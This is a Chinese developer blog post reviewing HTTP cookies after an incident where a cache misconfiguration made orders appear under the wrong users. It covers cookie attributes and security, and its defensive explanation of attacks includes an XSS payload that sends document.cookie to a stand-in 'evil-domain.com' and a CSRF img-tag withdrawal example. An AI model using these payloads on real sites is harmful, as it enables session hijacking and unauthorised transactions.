

  
    
  


  





  

<!DOCTYPE html>
<html lang="zh-cn">
  <head>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="generator" content="Hugo 0.27.1 with theme Tranquilpeak 0.4.1-BETA">
    <title>回顾Cookie</title>
    <meta name="author" content="Hao DING">
    <meta name="keywords" content="">

    <link rel="icon" href="https://haoding0713@github.io/favicon.png">
    

    
    <meta name="description" content="最近系统爆出了一个奇怪的问题，用户A购买的订单莫名漂移，最后到了用户B的名下。问题排查过程中，从最开始的迷茫，多向出击尝试找到问题，到逐步缩小范围，定位问题。最终把问题给找到了，也进行了修复。过程中由于对一些技术细节把握不准，费去了不少的时间。特此做一个梳理，整理成文，作为经验总结。
">
    <meta property="og:description" content="最近系统爆出了一个奇怪的问题，用户A购买的订单莫名漂移，最后到了用户B的名下。问题排查过程中，从最开始的迷茫，多向出击尝试找到问题，到逐步缩小范围，定位问题。最终把问题给找到了，也进行了修复。过程中由于对一些技术细节把握不准，费去了不少的时间。特此做一个梳理，整理成文，作为经验总结。
">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="回顾Cookie">
    <meta property="og:url" content="/2017/09/review-cookie/">
    <meta property="og:site_name" content="Coder DH&#39;s Blog">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Coder DH&#39;s Blog">
    <meta name="twitter:description" content="最近系统爆出了一个奇怪的问题，用户A购买的订单莫名漂移，最后到了用户B的名下。问题排查过程中，从最开始的迷茫，多向出击尝试找到问题，到逐步缩小范围，定位问题。最终把问题给找到了，也进行了修复。过程中由于对一些技术细节把握不准，费去了不少的时间。特此做一个梳理，整理成文，作为经验总结。
">
    
    

    
    

    
      <meta property="og:image" content="https://haoding0713@github.io/img/avatar.png">
    

    
      <meta property="og:image" content="https://haoding0713@github.io/img/cookies.jpg">
    
    
    

    

    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha256-eZrrJcwDc/3uDhsdt61sL2oOBY362qM3lon1gyExkL0=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.css" integrity="sha256-vuXZ9LGmmwtjqFX1F+EKin1ThZMub58gKULUyf0qECk=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css" integrity="sha256-SEa4XYAHihTcEP1f5gARTB2K26Uk8PsndQYHQC1f4jU=" crossorigin="anonymous" />
    
    
    <link rel="stylesheet" href="https://haoding0713@github.io/css/style-fpbzgxsy0kgmdvyrj5ykkg6ratccrk3gocmaqn4xpcjywmv5dteilzucro4f.min.css" />
    
    

    
      
    
    
  </head>

  <body>
    <div id="blog">
      <header id="header" data-behavior="4">
  <i id="btn-open-sidebar" class="fa fa-lg fa-bars"></i>
  <div class="header-title">
    <a class="header-title-link" href="https://haoding0713@github.io/">Coder DH&#39;s Blog</a>
  </div>
  
    
      <a class="header-right-picture "
         href="https://haoding0713@github.io/#about">
    
    
    
      
        <img class="header-picture" src="https://haoding0713@github.io/img/avatar.png" alt="作者的图片" />
      
    
    </a>
  
</header>

      <nav id="sidebar" data-behavior="4">
  <div class="sidebar-container">
    
      <div class="sidebar-profile">
        <a href="https://haoding0713@github.io/#about">
          <img class="sidebar-profile-picture" src="https://haoding0713@github.io/img/avatar.png" alt="作者的图片" />
        </a>
        <h4 class="sidebar-profile-name">Hao DING</h4>
        
          <h5 class="sidebar-profile-bio">Pain past is pleasure.</h5>
        
      </div>
    
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://haoding0713@github.io/">
    
      <i class="sidebar-button-icon fa fa-lg fa-home"></i>
      
      <span class="sidebar-button-desc">首页</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://haoding0713@github.io/categories">
    
      <i class="sidebar-button-icon fa fa-lg fa-bookmark"></i>
      
      <span class="sidebar-button-desc">分类</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://haoding0713@github.io/tags">
    
      <i class="sidebar-button-icon fa fa-lg fa-tags"></i>
      
      <span class="sidebar-button-desc">标签</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://haoding0713@github.io/archives">
    
      <i class="sidebar-button-icon fa fa-lg fa-archive"></i>
      
      <span class="sidebar-button-desc">归档</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://haoding0713@github.io/#about">
    
      <i class="sidebar-button-icon fa fa-lg fa-question"></i>
      
      <span class="sidebar-button-desc">关于</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://github.com/haoding0713" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-github"></i>
      
      <span class="sidebar-button-desc">GitHub</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://stackoverflow.com/users/981288/hao-ding" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-stack-overflow"></i>
      
      <span class="sidebar-button-desc">Stack Overflow</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://haoding0713@github.io/index.xml">
    
      <i class="sidebar-button-icon fa fa-lg fa-rss"></i>
      
      <span class="sidebar-button-desc">RSS</span>
    </a>
  </li>


    </ul>
  </div>
</nav>

      

      <div id="main" data-behavior="4"
        class="
               hasCoverMetaIn
               ">
        <article class="post" itemscope itemType="http://schema.org/BlogPosting">
          
          
            <div class="post-header main-content-wrap text-center">
  
    <h1 class="post-title" itemprop="headline">
      回顾Cookie
    </h1>
  
  
  <div class="postShorten-meta post-meta">
    
      <time itemprop="datePublished" datetime="2017-09-21T00:00:00Z">
        
  九月 21, 2017

      </time>
    
    
  
  
    <span>发布在</span>
    
      <a class="category-link" href="https://haoding0713@github.io/categories/web-security">web security</a>, 
    
      <a class="category-link" href="https://haoding0713@github.io/categories/cookie">cookie</a>
    
  


  </div>

</div>
          
          <div class="post-content markdown" itemprop="articleBody">
            <div class="main-content-wrap">
              <p>最近系统爆出了一个奇怪的问题，用户A购买的订单莫名漂移，最后到了用户B的名下。问题排查过程中，从最开始的迷茫，多向出击尝试找到问题，到逐步缩小范围，定位问题。最终把问题给找到了，也进行了修复。过程中由于对一些技术细节把握不准，费去了不少的时间。特此做一个梳理，整理成文，作为经验总结。
</p>

<p>##一、排查问题
订单发生了奇怪的串号，不过技术人员是不能迷信，那么就要揪出这个作祟的“幽灵”。考虑到系统上线稳定运行好几年了，从未遇到过这样的情况；而且又是在大促这个敏感的时间，最先确认相关部分的代码最近并未做修改。接下来结合“订单串号”这个现象，很快就把目光集中到了客户端在浏览过程中，是否被劫持/篡改这一点上。这就引出了这次的主角Cookie。</p>

<h2 id="br"><br/></h2>

<p>##二、熟悉的HTTP
在目前Web的世界里，HTTP几乎主导了所有的应用。它负责浏览器和Web服务器之间的通信。而HTTP本身是一个无状态的协议，这就意味着，服务器不会保留请求相关的信息，同一个用户的两个请求，在它看来没有任何关联。</p>

<h2 id="br-1"><br/></h2>

<p>##三、Cookie的原理</p>

<p>如果网站只是提供静态资源（记得早期大多数网站基本以静态资源为主），那么HTTP虽然是无状态的，但也不影响浏览。随着技术的发展，时至今日，网站的交互越发丰富，如何保存一个用户的状态信息就非常有必要了。想象一下不保存用户的状态信息的场景，添加购物车需要登录一次，打开购物车结算要登录一次，最后要支付又要登录一次（哪个网站这么搞的话，估计没几天就该倒闭了吧）。</p>

<p><br/></p>

<h4 id="1-cookie是什么">1. Cookie是什么？</h4>

<p>HTTP cookie (其他叫法有web cookie, browser cookie) 是服务器发回到浏览器的一小部分数据。浏览器可以保存下来，并添加在下一次请求中发送回服务器。 最常见的是例子是通过传递cookie，告诉服务器这些请求来自同一个用户，从而可以保持登录的状态。这样就实现了在无状态的HTTP上，记录了状态相关的信息。</p>

<p><br/></p>

<h4 id="2-cookie适用的场景">2. Cookie适用的场景</h4>

<p>主要有三种主要使用的场景：</p>

<ul>
<li><p>会话管理
比如： 登录, 购物车信息或者其他任意服务器需要记录的信息。</p></li>

<li><p>个性设置
比如：用户的喜好设置, 主题，语言等等。</p></li>

<li><p>访问跟踪
比如：常见的广告，推荐等基于用户访问记录的分析和应用。</p></li>
</ul>

<p><br/></p>

<h4 id="3-cookie的使用">3. Cookie的使用</h4>

<p><strong>Server</strong>：服务端根据需要在Response（Http的响应，下文统一使用Response）中，使用Set-Cookie 报头来设置。</p>

<p>语法：       <code>Set-Cookie: &lt;nameA&gt;=&lt;valueA&gt;; &lt;nameB&gt;=&lt;valueB&gt;</code></p>

<p>下面是一个简单的例子：</p>

<pre><code class="language-http">HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco
Set-Cookie: tasty_cookie=strawberry
[page content]
</code></pre>

<p><strong>Client</strong>：浏览器在收到Response后，会将cookie保存，并在下一次的Request（Http的请求，下文统一使用Request）中，利用Cookie报头传回刚才的信息。</p>

<pre><code class="language-http">GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry
</code></pre>

<p><br/></p>

<h4 id="4-cookie的过期时间">4. Cookie的过期时间</h4>

<ul>
<li><p><strong>会话cookie</strong> : 刚才创建的cookie在浏览器关闭的时候，会被删除（通常是发生在内存中）。</p></li>

<li><p><strong>持久化cookie</strong>：通过设置Expires或者Max-Age，则可以将cookie进行持久化（不同的浏览器会保存在不同的应用目录下）</p></li>
</ul>

<p><br/></p>

<h4 id="5-cookie的安全设置">5. Cookie的安全设置</h4>

<ul>
<li><p><strong>Secure选项</strong>： 告诉浏览器，仅当Request在Https协议下才发送cookie。建议是无论有没有secure选项，都不应该将敏感信息保存在cookie中。</p></li>

<li><p><strong>HttpOnly选项</strong>： HttpOnly选项用于防范XSS跨站攻击，设置后，JS脚本无法通过Document.cookie方法来访问保存的cookie。</p></li>
</ul>

<p><code>比较常见的案例是，当cookie保存了服务器端的sessionID时，通过设置HttpOnly来防止篡改</code></p>

<p><br/></p>

<h4 id="6-cookie的作用范围">6. Cookie的作用范围</h4>

<p>在协议规范中， <em>Domain</em> 和 <em>Path</em> 属性限定了cookie的作用范围： Cookie可以被发送回哪些URL。</p>

<ul>
<li><p><strong>Domain</strong>：限定了发送cookie的目标域名地址。如果没有设置，那么默认是当前请求的域名，不包括子域名。如果设置了目标域名地址，子域名会被包含在内。</p>

<p>_举个例子_：
<code>设置Domain=mozilla.org，那么在往子域名developer.mozilla.org发送请求时，同样会带上cookie。</code></p></li>

<li><p><strong>Path</strong>：指定了具体的某一个URL，只有向这个URL发送请求时，才允许带上cookie。
_举个例子_：
<code>设置Path=/docs, 那么发往一下URL的请求都会带上cookie.</code></p>

<pre><code class="language-http">/docs
/docs/Web/
/docs/Web/HTTP
</code></pre></li>
</ul>

<p><br/></p>

<h2 id="四-cookie的安全">四、Cookie的安全</h2>

<p>上面提到的Secury和HttpOnly选项，在一定程度上起到了保护作用，但由于HTTP协议本身的原因（明文传递），所以还是要再次强调：</p>

<ul>
<li>不要在cookie中存放敏感的信息；</li>
<li>由于协议本身，以及浏览器的实现，仅保存少量信息在cookie中；</li>
<li>对cookie中传递的信息进行加密；</li>
</ul>

<p><br/></p>

<h4 id="1-会话劫持和xss攻击">1. 会话劫持和XSS攻击</h4>

<p>恶意用户会利用XSS进行脚本的注入，并在其中执行预设的代码，窃取用户的信息。</p>

<p><em>举个例子</em>:
<code>(new Image()).src = &quot;http://www.evil-domain.com/steal-cookie.php?cookie=&quot; + document.cookie;</code></p>

<p><br/></p>

<h4 id="2-跨站请求伪造攻击-csrf">2. 跨站请求伪造攻击(CSRF)</h4>

<p>维基百科上有一个很好的例子：
<code>&lt;img src=&quot;http://bank.example.com/withdraw?account=bob&amp;amount=1000000&amp;for=mallory&quot;&gt;</code></p>

<p>从例子不难看出，这样的攻击主要目标是在cookie信息依然有效的情况下，通过注入一段恶意脚本，这样用户在不知请的情况下，转走账户下的钱。</p>

<p>因此网站需要采用技术手段，进行防范：</p>

<ul>
<li>对输入参数进行过滤和校验</li>
<li>敏感操作前强制用户进行确认（比如输入密码等）</li>
<li>区分不同cookie，设置不同的有效期</li>
</ul>

<p><br/></p>

<h4 id="3-尽早进行https迁移">3. 尽早进行HTTPS迁移</h4>

<p>通过升级到HTTPS安全加密服务，即通过对传统HTTP通道添加SSL安全套接层，可以防止中间人对用户隐私的嗅探和劫持。（同时将原有的HTTP端口通过rewrite进行强制跳转）</p>

<p><br/></p>

<h2 id="五-复盘">五、复盘</h2>

<p>回到最初那”幽灵“般的串单现象，在确定后台代码没有改动的情况下，不断尝试重现问题的过程中，最终把问题缩小到为了提升访问速度而设置的缓存上。</p>

<p>由于不小心在配置中，开启了对页面上cookie的缓存，导致部分用户在首次访问时，拿到了他人的缓存。从而就这么充当了一会”黑客“。</p>

<p>复盘看来，这一次主要受影响的是PC的业务占整体比重不大；同时技术团队响应及时，分头排查最终排除问题。</p>

<p>但也算是一个警醒， 对技术不能有随意的态度，对遇到的细节要敢于深挖。</p>

<hr />

<p>###Reference:
<a href="https://en.wikipedia.org/wiki/Cross-site_request_forgery">CSRF Wikipedia</a>
<a href="https://www.nczonline.net/blog/2009/05/05/http-cookies-explained/">Http Cookies Explained</a>
<a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies">MDN上关于Cookie的文档</a></p>
              
            </div>
          </div>
          <div id="post-footer" class="post-footer main-content-wrap">
            
              
            
            
  <div class="post-actions-wrap">
      <nav >
        <ul class="post-actions post-action-nav">
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://haoding0713@github.io/2017/10/java-enums/" data-tooltip="【译】Java语言之Enums： 集优雅与可玩性与一体">
              
                <i class="fa fa-angle-left"></i>
                <span class="hide-xs hide-sm text-small icon-ml">下一篇</span>
              </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://haoding0713@github.io/2017/09/consistence-protocol-in-distributed-system/" data-tooltip="分布式系统中的一致性协议">
              
                <span class="hide-xs hide-sm text-small icon-mr">上一篇</span>
                <i class="fa fa-angle-right"></i>
              </a>
            </li>
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https://haoding0713@github.io/2017/09/review-cookie/">
              <i class="fa fa-facebook-official"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https://haoding0713@github.io/2017/09/review-cookie/">
              <i class="fa fa-twitter"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://plus.google.com/share?url=https://haoding0713@github.io/2017/09/review-cookie/">
              <i class="fa fa-google-plus"></i>
            </a>
          </li>
        
      
      
        <li class="post-action">
          <a class="post-action-btn btn btn--default" href="#disqus_thread">
            <i class="fa fa-comment-o"></i>
          </a>
        </li>
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  </div>


            
              
                <div id="disqus_thread">
  <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>
              
            
          </div>
        </article>
        <footer id="footer" class="main-content-wrap">
  <span class="copyrights">
    &copy; 2017 Hao DING. All Rights Reserved
  </span>
</footer>

      </div>
      <div id="bottom-bar" class="post-bottom-bar" data-behavior="4">
        
  <div class="post-actions-wrap">
      <nav >
        <ul class="post-actions post-action-nav">
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://haoding0713@github.io/2017/10/java-enums/" data-tooltip="【译】Java语言之Enums： 集优雅与可玩性与一体">
              
                <i class="fa fa-angle-left"></i>
                <span class="hide-xs hide-sm text-small icon-ml">下一篇</span>
              </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://haoding0713@github.io/2017/09/consistence-protocol-in-distributed-system/" data-tooltip="分布式系统中的一致性协议">
              
                <span class="hide-xs hide-sm text-small icon-mr">上一篇</span>
                <i class="fa fa-angle-right"></i>
              </a>
            </li>
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https://haoding0713@github.io/2017/09/review-cookie/">
              <i class="fa fa-facebook-official"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https://haoding0713@github.io/2017/09/review-cookie/">
              <i class="fa fa-twitter"></i>
            </a>
          </li>
        
          <li class="post-action hide-xs">
            <a class="post-action-btn btn btn--default" target="new" href="https://plus.google.com/share?url=https://haoding0713@github.io/2017/09/review-cookie/">
              <i class="fa fa-google-plus"></i>
            </a>
          </li>
        
      
      
        <li class="post-action">
          <a class="post-action-btn btn btn--default" href="#disqus_thread">
            <i class="fa fa-comment-o"></i>
          </a>
        </li>
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  </div>


      </div>
      <div id="share-options-bar" class="share-options-bar" data-behavior="4">
  <i id="btn-close-shareoptions" class="fa fa-close"></i>
  <ul class="share-options">
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fhaoding0713%40github.io%2F2017%2F09%2Freview-cookie%2F">
          <i class="fa fa-facebook-official"></i><span>分享到 Facebook</span>
        </a>
      </li>
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://twitter.com/intent/tweet?text=https%3A%2F%2Fhaoding0713%40github.io%2F2017%2F09%2Freview-cookie%2F">
          <i class="fa fa-twitter"></i><span>分享到 Twitter</span>
        </a>
      </li>
    
      <li class="share-option">
        <a class="share-option-btn" target="new" href="https://plus.google.com/share?url=https%3A%2F%2Fhaoding0713%40github.io%2F2017%2F09%2Freview-cookie%2F">
          <i class="fa fa-google-plus"></i><span>分享到 Google&#43;</span>
        </a>
      </li>
    
  </ul>
</div>
<div id="share-options-mask" class="share-options-mask"></div>
    </div>
    
    <div id="about">
  <div id="about-card">
    <div id="about-btn-close">
      <i class="fa fa-remove"></i>
    </div>
    
      <img id="about-card-picture" src="https://haoding0713@github.io/img/avatar.png" alt="作者的图片" />
    
    <h4 id="about-card-name">Hao DING</h4>
    
      <div id="about-card-bio">Pain past is pleasure.</div>
    
    
      <div id="about-card-job">
        <i class="fa fa-briefcase"></i>
        <br/>
        Senior Developper
      </div>
    
    
      <div id="about-card-location">
        <i class="fa fa-map-marker"></i>
        <br/>
        SH, CHINA
      </div>
    
  </div>
</div>

    <div id="algolia-search-modal" class="modal-container">
  <div class="modal">
    <div class="modal-header">
      <span class="close-button"><i class="fa fa-close"></i></span>
      <a href="https://algolia.com" target="_blank" rel="noopener" class="searchby-algolia text-color-light link-unstyled">
        <span class="searchby-algolia-text text-color-light text-small">by</span>
        <img class="searchby-algolia-logo" src="https://www.algolia.com/static_assets/images/press/downloads/algolia-light.svg">
      </a>
      <i class="search-icon fa fa-search"></i>
      <form id="algolia-search-form">
        <input type="text" id="algolia-search-input" name="search"
          class="form-control input--large search-input" placeholder="搜索" />
      </form>
    </div>
    <div class="modal-body">
      <div class="no-result text-color-light text-center"></div>
      <div class="results">
        
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://haoding0713@github.io/2017/10/alipay-technical-architecture-and-practice/">
                <h3 class="media-heading">【转】蚂蚁金服11.11：支付宝和蚂蚁花呗的技术架构及实践</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Oct 10, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>每年“双11”都是一场电商盛会，消费者狂欢日。今年双11的意义尤为重大，它已经发展成为全世界电商和消费者都参与进来的盛宴。而对技术人员来说，双十一无疑已经成为一场大考，考量的角度是整体架构、基础中间件、运维工具、人员等。</p>

<p>一次成功的大促准备不光是针对活动本身对系统和架构做的优化措施，比如：流量控制，缓存策略，依赖管控，性能优化……更是与长时间的技术积累和打磨分不开。
</p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://haoding0713@github.io/2017/10/java-reflection-tutorial/">
                <h3 class="media-heading">Java反射教程</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Oct 10, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>Java反射为程序提供了无需在编译时知道具体的类，方法等名称，并在运行时检查类，接口，字段和方法的能力。使用反射可以实例化新对象，调用方法和获取/设置字段值。本文不仅会涉及Java反射的基础知识，例如如何使用数组，注释，泛型和动态代理，并进行动态类加载和重新加载。最后还会解释一些有关运行时获取泛型的常见问题。比如泛型信息并不是在运行时完全丢失。
</p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://haoding0713@github.io/2017/10/java-enums/">
                <h3 class="media-heading">【译】Java语言之Enums： 集优雅与可玩性与一体</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Oct 10, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>话说Java 8已经到来(译者补充：时至今日，Java 9也呼之欲出)，但我们真的已经非常了解从Java 5那时就引入的Enum（枚举）了吗？ 枚举在Java语言中的作用被低估了，除了定义/保存常量之类的日常用法，其实它还有更多的用武之地。
</p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://haoding0713@github.io/2017/09/review-cookie/">
                <h3 class="media-heading">回顾Cookie</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Sep 9, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>最近系统爆出了一个奇怪的问题，用户A购买的订单莫名漂移，最后到了用户B的名下。问题排查过程中，从最开始的迷茫，多向出击尝试找到问题，到逐步缩小范围，定位问题。最终把问题给找到了，也进行了修复。过程中由于对一些技术细节把握不准，费去了不少的时间。特此做一个梳理，整理成文，作为经验总结。
</p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://haoding0713@github.io/2017/09/consistence-protocol-in-distributed-system/">
                <h3 class="media-heading">分布式系统中的一致性协议</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Sep 9, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>本文汇总并介绍了目前分布式系统中常见的一些一致性协议：两阶段提交协议，三阶段提交协议，向量时钟，RWN协议，paxos协议，Raft协议。作为是一个索引。
</p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://haoding0713@github.io/2017/09/how-to-install-yarout-on-arch/">
                <h3 class="media-heading">[译]如何在Archlinux上安装Yaourt</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Sep 9, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>9月一次日常系统升级后，导致Remarkable无法使用。重装了也没解决，最后发现是依赖的webkitgtk版本过旧，被官方标记为不安全，从仓库中移除。这过程中，Yaourt和AUR也被我翻来倒去地折腾，差点被玩坏。所以还是备份一下Yaourt的安装方式。
</p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://haoding0713@github.io/2017/09/my-new-blog/">
                <h3 class="media-heading">My New Blog</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Sep 9, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>新的博客。是记录，也是一种督促。
</p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://haoding0713@github.io/post/">
                <h3 class="media-heading">Posts</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Oct 10, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
      </div>
    </div>
    <div class="modal-footer">
      <p class="results-count text-medium"
         data-message-zero=""
         data-message-one=""
         data-message-other="">
         8 posts found
      </p>
    </div>
  </div>
</div>
    
  
    
    <div id="cover" style="background-image:url('https://haoding0713@github.io/images/cover.jpg');"></div>
  


    
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js" integrity="sha256-IFHWFEbU2/+wNycDECKgjIRSirRNIDp2acEB5fvdVRU=" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.8.0/highlight.min.js" integrity="sha256-+mpyNVJsNt4rVXCw0F+pAOiB3YxmHgrbJsx4ecPuUaI=" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.js" integrity="sha256-vMxgR/7FtLovVA+IPrR7+xTgIgARH7y9VZQnmmi0HDI=" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.js" integrity="sha256-N0qFUh7/9vLvia87dDndewmsgsyYoNkdA212tPc+2NI=" crossorigin="anonymous"></script>


<script src="https://haoding0713@github.io/js/script-qi9wbxp2ya2j6p7wx1i6tgavftewndznf4v0hy2gvivk1rxgc3lm7njqb6bz.min.js"></script>


<script>
$(document).ready(function() {
  hljs.configure({ classPrefix: '', useBR: false });
  $('pre.code-highlight, pre > code').each(function(i, block) {
    if (!$(this).hasClass('codeblock')) {
      $(this).addClass('codeblock');
    }
    hljs.highlightBlock(block);
  });
});
</script>

  
    
      <script>
        var disqus_config = function () {
          this.page.url = 'https:\/\/haoding0713@github.io\/2017\/09\/review-cookie\/';
          
            this.page.identifier = '\/2017\/09\/review-cookie\/'
          
        };
        (function() {
          
          
          if (window.location.hostname == "localhost") {
            return;
          }
          var d = document, s = d.createElement('script');
          var disqus_shortname = 'hugo-tranquilpeak-theme';
          s.src = '//' + disqus_shortname + '.disqus.com/embed.js';

          s.setAttribute('data-timestamp', +new Date());
          (d.head || d.body).appendChild(s);
        })();
      </script>
    
  



    
  </body>
</html>

